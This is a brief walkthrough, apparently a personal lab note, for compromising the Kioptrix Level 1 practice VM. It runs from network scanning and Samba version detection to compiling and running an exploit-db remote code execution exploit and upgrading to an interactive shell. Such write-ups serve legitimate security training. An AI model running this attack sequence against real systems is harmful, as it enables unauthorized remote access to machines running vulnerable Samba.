# Kioptrix Level 1

the quick method :

netdiscover -i eth0 

nmap -p- -A IP 

identify it's running Samba 

msfconsole 

use auxiliary(scanner/smb/smb\_version 

set RHOSTS IP 

run 

confirm it's running Samba 2.2.1a 

search google for 'Samba 2.2.1a' exploit RCE: <https://www.exploit-db.com/exploits/10> grab this exploit gcc 10.c -o 10&#x20;

./10 -b 0 IP&#x20;

get a better shell \[interactive shell]

&#x20;/bin/bash -i

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2Fqz4hdVC1BDTSpzMgRlrf%2Fimage.png?alt=media\&token=848798de-2364-47c4-8cae-93df936e87d2)